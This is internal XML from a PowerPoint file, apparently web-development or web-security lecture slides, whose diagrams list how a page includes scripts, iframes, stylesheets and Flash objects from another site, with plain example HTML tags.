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notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink18.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink19.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink20.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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5" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId71"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1454" r:id="rId3"/>
    <p:sldId id="2064" r:id="rId4"/>
    <p:sldId id="2065" r:id="rId5"/>
    <p:sldId id="2066" r:id="rId6"/>
    <p:sldId id="2121" r:id="rId7"/>
    <p:sldId id="2067" r:id="rId8"/>
    <p:sldId id="2068" r:id="rId9"/>
    <p:sldId id="2071" r:id="rId10"/>
    <p:sldId id="2085" r:id="rId11"/>
    <p:sldId id="2122" r:id="rId12"/>
    <p:sldId id="2133" r:id="rId13"/>
    <p:sldId id="2134" r:id="rId14"/>
    <p:sldId id="2123" r:id="rId15"/>
    <p:sldId id="1455" r:id="rId16"/>
    <p:sldId id="2089" r:id="rId17"/>
    <p:sldId id="2090" r:id="rId18"/>
    <p:sldId id="1460" r:id="rId19"/>
    <p:sldId id="1461" r:id="rId20"/>
    <p:sldId id="2024" r:id="rId21"/>
    <p:sldId id="765" r:id="rId22"/>
    <p:sldId id="942" r:id="rId23"/>
    <p:sldId id="944" r:id="rId24"/>
    <p:sldId id="956" r:id="rId25"/>
    <p:sldId id="1883" r:id="rId26"/>
    <p:sldId id="1885" r:id="rId27"/>
    <p:sldId id="1886" r:id="rId28"/>
    <p:sldId id="1887" r:id="rId29"/>
    <p:sldId id="1875" r:id="rId30"/>
    <p:sldId id="1905" r:id="rId31"/>
    <p:sldId id="2124" r:id="rId32"/>
    <p:sldId id="1324" r:id="rId33"/>
    <p:sldId id="570" r:id="rId34"/>
    <p:sldId id="2025" r:id="rId35"/>
    <p:sldId id="2050" r:id="rId36"/>
    <p:sldId id="2125" r:id="rId37"/>
    <p:sldId id="2132" r:id="rId38"/>
    <p:sldId id="1325" r:id="rId39"/>
    <p:sldId id="1894" r:id="rId40"/>
    <p:sldId id="1895" r:id="rId41"/>
    <p:sldId id="1906" r:id="rId42"/>
    <p:sldId id="2126" r:id="rId43"/>
    <p:sldId id="2095" r:id="rId44"/>
    <p:sldId id="2094" r:id="rId45"/>
    <p:sldId id="2106" r:id="rId46"/>
    <p:sldId id="1902" r:id="rId47"/>
    <p:sldId id="1909" r:id="rId48"/>
    <p:sldId id="1722" r:id="rId49"/>
    <p:sldId id="1918" r:id="rId50"/>
    <p:sldId id="2098" r:id="rId51"/>
    <p:sldId id="2053" r:id="rId52"/>
    <p:sldId id="2117" r:id="rId53"/>
    <p:sldId id="2118" r:id="rId54"/>
    <p:sldId id="2119" r:id="rId55"/>
    <p:sldId id="2036" r:id="rId56"/>
    <p:sldId id="2059" r:id="rId57"/>
    <p:sldId id="2096" r:id="rId58"/>
    <p:sldId id="2099" r:id="rId59"/>
    <p:sldId id="2100" r:id="rId60"/>
    <p:sldId id="2127" r:id="rId61"/>
    <p:sldId id="2128" r:id="rId62"/>
    <p:sldId id="2045" r:id="rId63"/>
    <p:sldId id="2060" r:id="rId64"/>
    <p:sldId id="2107" r:id="rId65"/>
    <p:sldId id="2108" r:id="rId66"/>
    <p:sldId id="2109" r:id="rId67"/>
    <p:sldId id="2129" r:id="rId68"/>
    <p:sldId id="2130" r:id="rId69"/>
    <p:sldId id="2131" r:id="rId7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E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7010"/>
    <p:restoredTop sz="94507"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="184" y="8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70BFBE2-9675-40F8-B381-56229917F60F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1E509AF-CD00-4B74-BCFE-640D50D174DF}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000"/>
            <a:t>Scripts</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17A391BA-CB17-440D-BDF3-525EDD9E19F5}" type="parTrans" cxnId="{5E63D1E6-32C9-4611-8071-6F4FF785BC76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA041D6D-4CB0-478A-8462-E246164842A8}" type="sibTrans" cxnId="{5E63D1E6-32C9-4611-8071-6F4FF785BC76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3F7729E-B265-46AC-8B53-25CAF5DC9A4B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>&lt;script  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>script.js</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>”&gt;  &lt;/script&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EC7E5BB-B6F0-420B-9960-972EB2B267B1}" type="parTrans" cxnId="{64E17963-AA92-49CD-B8A7-BE552F48CA63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{951C2A1D-7F0F-4ACF-A3C1-EE14695D616F}" type="sibTrans" cxnId="{64E17963-AA92-49CD-B8A7-BE552F48CA63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Frames  </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E4B22A8-846E-47DE-8296-BE082A44630A}" type="parTrans" cxnId="{F5D40B55-AD21-4B8C-8B6F-E530C7AC58C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9924BFDF-55A0-410B-8A24-086899621782}" type="sibTrans" cxnId="{F5D40B55-AD21-4B8C-8B6F-E530C7AC58C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B533EB47-3351-441A-99F5-364D988F6206}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>&lt;iframe  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>src</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>frame.html</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>”&gt; &lt;/iframe&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15E65531-79A0-4D2E-9306-1FE7EBD0F35C}" type="parTrans" cxnId="{778A4660-75B9-496A-868D-8ED3220304F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF99C64B-CC1F-4955-86B8-D53F9851D085}" type="sibTrans" cxnId="{778A4660-75B9-496A-868D-8ED3220304F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A662CE9E-7520-4106-973F-7319CF91AA2C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Stylesheets (CSS)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{196C5C57-EA92-4337-8703-16CDB8EFA669}" type="parTrans" cxnId="{E36601BB-FF54-4DB2-BAC5-8273A4A576DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A6E42DD-C811-46E1-AE45-6628A11A0378}" type="sibTrans" cxnId="{E36601BB-FF54-4DB2-BAC5-8273A4A576DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8B8D993-71D2-4C32-A175-26F0F14E6A5F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>&lt;link </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>rel</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=“stylesheet”  type="text/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>css</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>”  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>href</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>=“//</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>site.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>theme.css</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>" /&gt;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F7E1DAC-8ABC-45A9-8FCC-0B01D90FCCD8}" type="parTrans" cxnId="{C7F8F57D-9A7F-4BBA-828C-051CBDD99346}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA446DA2-1168-4108-A69B-1D605F8AD372}" type="sibTrans" cxnId="{C7F8F57D-9A7F-4BBA-828C-051CBDD99346}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Flash objects using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
            <a:t>swfobject.js</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t> script (now obsolete)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9ADD713-1F5E-4FA7-9A35-3D6966EE59D8}" type="parTrans" cxnId="{BD294527-BC4A-435B-A251-1BFA08A09BD7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B731CEC8-B3D5-48F3-A10D-A6435DCEF37C}" type="sibTrans" cxnId="{BD294527-BC4A-435B-A251-1BFA08A09BD7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F840299B-C41E-42CF-BF57-3FADF5DEEDB6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{398E6769-25EE-4231-8F79-9DB931E4EDF6}" type="parTrans" cxnId="{4947BA5D-FD3B-4AAD-AD9E-0ECED8A4EBB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DE7564F-066E-4B1F-BF33-66E7F6B1863E}" type="sibTrans" cxnId="{4947BA5D-FD3B-4AAD-AD9E-0ECED8A4EBB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" type="pres">
      <dgm:prSet presAssocID="{170BFBE2-9675-40F8-B381-56229917F60F}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1B86C92C-A1F4-D84E-9622-D303CEBFC238}" type="pres">
      <dgm:prSet presAssocID="{51E509AF-CD00-4B74-BCFE-640D50D174DF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C2800F39-ED00-1C42-A421-478B94A9B2BB}" type="pres">
      <dgm:prSet presAssocID="{51E509AF-CD00-4B74-BCFE-640D50D174DF}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ADB5407-C5E6-914C-AD86-83EF66517405}" type="pres">
      <dgm:prSet presAssocID="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B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F22C851F-F44C-F742-AA3F-F857933F0C1B}" type="pres">
      <dgm:prSet presAssocID="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B891DFA2-2619-E24B-B213-796A388D07C5}" type="pres">
      <dgm:prSet presAssocID="{A662CE9E-7520-4106-973F-7319CF91AA2C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86159C03-7AEA-384D-8A0B-0D9BCC343F64}" type="pres">
      <dgm:prSet presAssocID="{A662CE9E-7520-4106-973F-7319CF91AA2C}" presName="childText" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EABCF68C-1ECF-654B-AC03-AEEE5DE7A676}" type="pres">
      <dgm:prSet presAssocID="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4" custLinFactNeighborY="15194">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60F8D499-6C6F-694E-A9B1-9E678EBA440C}" type="pres">
      <dgm:prSet presAssocID="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}" presName="childText" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0746ED04-7FE9-754C-9E51-96AEC350E59A}" type="presOf" srcId="{B533EB47-3351-441A-99F5-364D988F6206}" destId="{F22C851F-F44C-F742-AA3F-F857933F0C1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5C3F3226-8805-3243-91F8-BA737991E765}" type="presOf" srcId="{170BFBE2-9675-40F8-B381-56229917F60F}" destId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BD294527-BC4A-435B-A251-1BFA08A09BD7}" srcId="{170BFBE2-9675-40F8-B381-56229917F60F}" destId="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}" srcOrd="3" destOrd="0" parTransId="{F9ADD713-1F5E-4FA7-9A35-3D6966EE59D8}" sibTransId="{B731CEC8-B3D5-48F3-A10D-A6435DCEF37C}"/>
    <dgm:cxn modelId="{A35B7644-8C14-EF4A-8489-AE2D93C73459}" type="presOf" srcId="{F840299B-C41E-42CF-BF57-3FADF5DEEDB6}" destId="{60F8D499-6C6F-694E-A9B1-9E678EBA440C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F6C4CD44-C60B-3743-9872-CD28C16E0A8E}" type="presOf" srcId="{B3F7729E-B265-46AC-8B53-25CAF5DC9A4B}" destId="{C2800F39-ED00-1C42-A421-478B94A9B2BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F5D40B55-AD21-4B8C-8B6F-E530C7AC58C5}" srcId="{170BFBE2-9675-40F8-B381-56229917F60F}" destId="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B}" srcOrd="1" destOrd="0" parTransId="{8E4B22A8-846E-47DE-8296-BE082A44630A}" sibTransId="{9924BFDF-55A0-410B-8A24-086899621782}"/>
    <dgm:cxn modelId="{4947BA5D-FD3B-4AAD-AD9E-0ECED8A4EBB6}" srcId="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}" destId="{F840299B-C41E-42CF-BF57-3FADF5DEEDB6}" srcOrd="0" destOrd="0" parTransId="{398E6769-25EE-4231-8F79-9DB931E4EDF6}" sibTransId="{5DE7564F-066E-4B1F-BF33-66E7F6B1863E}"/>
    <dgm:cxn modelId="{778A4660-75B9-496A-868D-8ED3220304F0}" srcId="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B}" destId="{B533EB47-3351-441A-99F5-364D988F6206}" srcOrd="0" destOrd="0" parTransId="{15E65531-79A0-4D2E-9306-1FE7EBD0F35C}" sibTransId="{DF99C64B-CC1F-4955-86B8-D53F9851D085}"/>
    <dgm:cxn modelId="{64E17963-AA92-49CD-B8A7-BE552F48CA63}" srcId="{51E509AF-CD00-4B74-BCFE-640D50D174DF}" destId="{B3F7729E-B265-46AC-8B53-25CAF5DC9A4B}" srcOrd="0" destOrd="0" parTransId="{1EC7E5BB-B6F0-420B-9960-972EB2B267B1}" sibTransId="{951C2A1D-7F0F-4ACF-A3C1-EE14695D616F}"/>
    <dgm:cxn modelId="{C7F8F57D-9A7F-4BBA-828C-051CBDD99346}" srcId="{A662CE9E-7520-4106-973F-7319CF91AA2C}" destId="{C8B8D993-71D2-4C32-A175-26F0F14E6A5F}" srcOrd="0" destOrd="0" parTransId="{6F7E1DAC-8ABC-45A9-8FCC-0B01D90FCCD8}" sibTransId="{DA446DA2-1168-4108-A69B-1D605F8AD372}"/>
    <dgm:cxn modelId="{68CD6C91-C62D-A147-9669-A3EAB4C77F52}" type="presOf" srcId="{C8B8D993-71D2-4C32-A175-26F0F14E6A5F}" destId="{86159C03-7AEA-384D-8A0B-0D9BCC343F64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D131E791-83F2-3C49-93AC-666FEAEC13AA}" type="presOf" srcId="{51E509AF-CD00-4B74-BCFE-640D50D174DF}" destId="{1B86C92C-A1F4-D84E-9622-D303CEBFC238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{15620EB7-D8EE-334A-8526-BE948B2FDF02}" type="presOf" srcId="{A662CE9E-7520-4106-973F-7319CF91AA2C}" destId="{B891DFA2-2619-E24B-B213-796A388D07C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E36601BB-FF54-4DB2-BAC5-8273A4A576DF}" srcId="{170BFBE2-9675-40F8-B381-56229917F60F}" destId="{A662CE9E-7520-4106-973F-7319CF91AA2C}" srcOrd="2" destOrd="0" parTransId="{196C5C57-EA92-4337-8703-16CDB8EFA669}" sibTransId="{1A6E42DD-C811-46E1-AE45-6628A11A0378}"/>
    <dgm:cxn modelId="{6D34B9C4-0B49-8348-8228-C26E73E91CDF}" type="presOf" srcId="{E6EE3AFD-F11B-4B92-8413-D8B9DFA3DF9B}" destId="{5ADB5407-C5E6-914C-AD86-83EF66517405}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{345053E4-EE2E-6747-8364-EAC0A0B06362}" type="presOf" srcId="{232ECD7D-D13C-47DF-8F3B-2797695F18B7}" destId="{EABCF68C-1ECF-654B-AC03-AEEE5DE7A676}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5E63D1E6-32C9-4611-8071-6F4FF785BC76}" srcId="{170BFBE2-9675-40F8-B381-56229917F60F}" destId="{51E509AF-CD00-4B74-BCFE-640D50D174DF}" srcOrd="0" destOrd="0" parTransId="{17A391BA-CB17-440D-BDF3-525EDD9E19F5}" sibTransId="{CA041D6D-4CB0-478A-8462-E246164842A8}"/>
    <dgm:cxn modelId="{2D009EDB-A7CB-7841-9449-9C3E2BF3C5D3}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{1B86C92C-A1F4-D84E-9622-D303CEBFC238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4730448-2CAD-DB4C-9267-71489D6E1F9D}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{C2800F39-ED00-1C42-A421-478B94A9B2BB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1F978BAB-30B6-144D-B75B-1B1B76F03828}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{5ADB5407-C5E6-914C-AD86-83EF66517405}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{00C0B46E-85A5-6244-881C-DFC1D4ED8987}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{F22C851F-F44C-F742-AA3F-F857933F0C1B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C076E47D-C577-9B48-931F-0027ADF02EE1}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{B891DFA2-2619-E24B-B213-796A388D07C5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5F948183-6B76-534F-BEFC-ECD1A6FFB181}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{86159C03-7AEA-384D-8A0B-0D9BCC343F64}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F142A27C-6DE5-BB4B-8A94-4F70A63BB96C}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{EABCF68C-1ECF-654B-AC03-AEEE5DE7A676}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EDC14BC3-96F0-6F44-AF54-0DAA6E493C90}" type="presParOf" srcId="{4FA1C5D7-8CEF-ED46-8BC6-C5DCF8F92A60}" destId="{60F8D499-6C6F-694E-A9B1-9E678EBA440C}" srcOrd="7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13C526E-8D22-42F6-9BC8-9522CE3CE920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C488B39B-5BA5-47E9-A760-BE856C7C01B6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400"/>
            <a:t>Data must be URL encoded</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C62E42DA-1D4E-4AF7-830C-B62AD98BD466}" type="parTrans" cxnId="{0021D332-C21D-40E8-949F-502ADB312F07}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{483AC843-2A7F-4078-8153-A8DD25FBB899}" type="sibTrans" cxnId="{0021D332-C21D-40E8-949F-502ADB312F07}">
      <dgm:prSet/>
      <dgm:spPr/>
